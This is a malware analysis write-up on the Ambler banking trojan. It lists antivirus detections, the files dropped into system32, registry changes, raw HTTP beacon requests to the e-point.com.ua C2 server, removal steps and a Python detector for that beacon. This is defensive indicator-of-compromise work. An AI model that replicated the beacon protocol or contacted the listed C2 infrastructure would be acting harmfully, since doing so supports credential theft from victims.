Trojan-Dropper.Win32.Ambler


Recently a user submitted a suspicious file; he informed us that he had downloaded it from a website that served it as a video codec. Below is the report of the virus scanner:

Report Generated: 18.3.2009 at 16.34.15 (GMT 1)
File Name: setup_exe
File Size: 63 KB
MD5 Hash: A11E0E5389C93738D793E850C8AAA1C1
SHA1 Hash: FB87D25EB2AB42392009809A2369F42618D3DDD1
Detection Rate: 7 on 24 (29,16 %)
Status: INFECTED


Antivirus Sig version Engine Version Result
a-squared 18/03/2009 4.0.0.32 Trojan-Dropper.Win32.Ambler!IK
Avira AntiVir 7.1.2.187 8.1.2.12 TR/Banker.Banker.aflq
Avast 090317-0 4.8.1229 -
AVG 270.11.18/2009 8.0.0.0 -
BitDefender 18/03/2009 7.0.0.2555 -
ClamAV 18/03/2009 0.93.1.0 -
Comodo 1066 3.8 -
Dr.Web 18/03/2009 5.0 -
Ewido 18/03/2009 4.0.0.2 -
F-PROT 6 20090317 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 18/03/2009 1001044 Trojan-Dropper.Win32.Ambler
Kaspersky 18/03/2009 8.0.0.357 -
McAfee 18/03/2009 5.1.0.0 PWS-Banker trojan
Malware Hash Registry 18/03/2009 N/A -
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler
Norman 2009/03/17 5.92.08 Trojan W32/Malware.FZKP
Panda 07/02/2009 9.5.1.00 -
QuickHeal 18 March, 2009 10.0 -
Solo Antivirus 18/03/2009 8.0 -
Sophos 18/03/2009 4.32.0 Troj/Spy-BV
TrendMicro 901(590100) 1.1-1001 -
VBA32 18/03/2009 3.12.0.300 -
VirusBuster 10.102.13 1.4.3 -

After execution of the malicious file, two files were copied into the system32 folder:

C:\WINDOWS\system32\wh
C:\WINDOWS\system32\kmsvc32.dll

The file kmsvc32.dll is classified as a spy tool:

a-squared 18/03/2009 4.0.0.32 Trojan-PWS.Win32.Agent!IK
AVG 270.11.18/2009 8.0.0.0 PSW.Generic7.TP
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler.M
Norman 2009/03/17 5.92.08 Backdoor W32/Smalldoor.DSTB

The malware modified the registry by adding these keys:

HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32\kmsvc32.dll
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32\kmsvc32.dll

Now, immediately after I opened Internet Explorer, the malware started to send and receive data with this IP:

85.17.209.45 (e-point.com.ua)

Internet traffic:

GET /admin/cd.php?userid=-- HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
Cache-Control: no-cache
HTTP/1.1 200 OK
 
POST /admin/dan.php HTTP/1.1
Referer: SAS
Content-Type: application/x-www-form-urlencoded
User-Agent: AE
Host: e-point.com.ua
Content-Length: 30
Cache-Control: no-cache
 
GET /admin/cd.php?userid=1190928_11344_24235789 HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
Cache-Control: no-cache

Note that the User-Agent is always set to AS or AE. Afterwards, we found new files in the Temporary Internet Files folder:
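As an added example (not part of the original analysis), the following Python script flags the beacon pattern seen above in a raw HTTP request capture: the fixed User-Agent strings AS/AE, the e-point.com.ua host and the /admin/cd.php and /admin/dan.php paths, and it extracts the userid bot identifier. The sample capture embedded in it is constructed in the shape of the traffic shown above; the example.com request is benign filler added to show a non-match.

```python
import re
# Indicators from the capture above: C2 host, beacon paths, fixed User-Agents.
C2_HOST = "e-point.com.ua"
BEACON_PATHS = {"/admin/cd.php", "/admin/dan.php"}
FIXED_UAS = {"AS", "AE"}

# Constructed sample in the shape of the capture; example.com is benign noise.
SAMPLE_CAPTURE = """GET /admin/cd.php?userid=-- HTTP/1.1
User-Agent: AS
Host: e-point.com.ua

GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0
Host: example.com

POST /admin/dan.php HTTP/1.1
User-Agent: AE
Host: e-point.com.ua

GET /admin/cd.php?userid=1190928_11344_24235789 HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
"""

def parse_requests(capture):
    """Yield (method, target, headers) for each request line and its headers."""
    for m in re.finditer(r"^([A-Z]+) (\S+) HTTP/1\.[01]\n((?:[^\n]+\n?)*)", capture, re.M):
        headers = {k.strip().lower(): v.strip()
                   for k, _, v in (l.partition(":") for l in m.group(3).splitlines())}
        yield m.group(1), m.group(2), headers

def match_ambler(method, target, headers):
    """Return a finding if the request matches the Ambler beacon, else None."""
    path, _, query = target.partition("?")
    reasons = []
    if headers.get("host") == C2_HOST:
        reasons.append("C2 host")
    if path in BEACON_PATHS:
        reasons.append("beacon path " + path)
    if headers.get("user-agent") in FIXED_UAS:
        reasons.append("fixed User-Agent " + headers["user-agent"])
    if not reasons:
        return None
    # userid is the bot identifier; "--" is the first check-in before one is assigned
    params = dict(p.partition("=")[::2] for p in query.split("&") if p)
    return {"method": method, "target": target, "userid": params.get("userid"), "reasons": reasons}

def scan_capture(capture):
    return [f for f in (match_ambler(*r) for r in parse_requests(capture)) if f]
```

Running scan_capture(SAMPLE_CAPTURE) returns three findings, one per beacon, with userid "--", None and "1190928_11344_24235789"; on a real proxy log the same three indicators can be matched independently, since the fixed User-Agent alone is already a strong signal.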


Screenshot of files


New files were also copied into the system32 folder:

C:\WINDOWS\system32\fiod.dll
C:\WINDOWS\system32\bb1.dat
C:\WINDOWS\system32\cmds.txt
C:\WINDOWS\system32\cs.dat
C:\WINDOWS\system32\fiod.dll
C:\WINDOWS\system32\ps1.dat
C:\WINDOWS\system32\rc.dat

How to remove Trojan-Dropper.Win32.Ambler?


1) Unregister the dll named kmsvc32.dll
2) Delete all created files
3) Delete all created registry keys
4) Restart the PC


Scan your system with NoVirusThanks Malware Remover.
